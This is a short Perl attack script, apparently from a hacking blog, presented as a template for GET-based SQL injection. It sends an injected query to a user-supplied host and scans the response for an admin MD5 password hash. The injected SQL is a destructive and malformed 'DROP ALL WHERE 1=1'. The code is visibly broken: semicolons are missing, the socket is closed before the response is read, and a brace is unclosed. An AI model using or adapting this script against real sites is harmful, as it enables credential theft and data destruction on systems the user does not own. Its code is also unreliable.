#!/usr/bin/perl
# www.infodox.co.cc
# blog.infodox.co.cc
# http://twitter.com/info_dox
#Template for GET SQL injections that retrieve an admin MD5 hash
use IO::Socket
### CONFIG ###
$vuln="vuln.php?vuln=" # the vuln page and param
$sql="DROP ALL WHERE 1=1" # some SQL code to be ran :)
$useragent="FireFox blah blah blah"
### END OF CONFIG ###
print "Insert the host to connect: ";
chomp ($host=<STDIN>);
$sock = IO::Socket::INET->new(Proto=>'tcp', PeerAddr=>"$host", PeerPort=>80)
or die "[-] Connecting ... Can't connect to host.\n\n";

$injection=$vuln.$sql

print $sock "GET $injection HTTP/1.1\n";
print $sock "Accept: */*n";
print $sock "User-Agent: $useragent\n";
print $sock "Host: $host\n";
print $sock "Connection: close\n\n";
close ($sock); #this line terminates the connection

# this bit validates MD5 hashes.
while($answer = <$sock>) {
if ($answer =~ /([0-9a-f]{32})/) {
print "[+] Found! The password hash is: $1\n";
exit(); }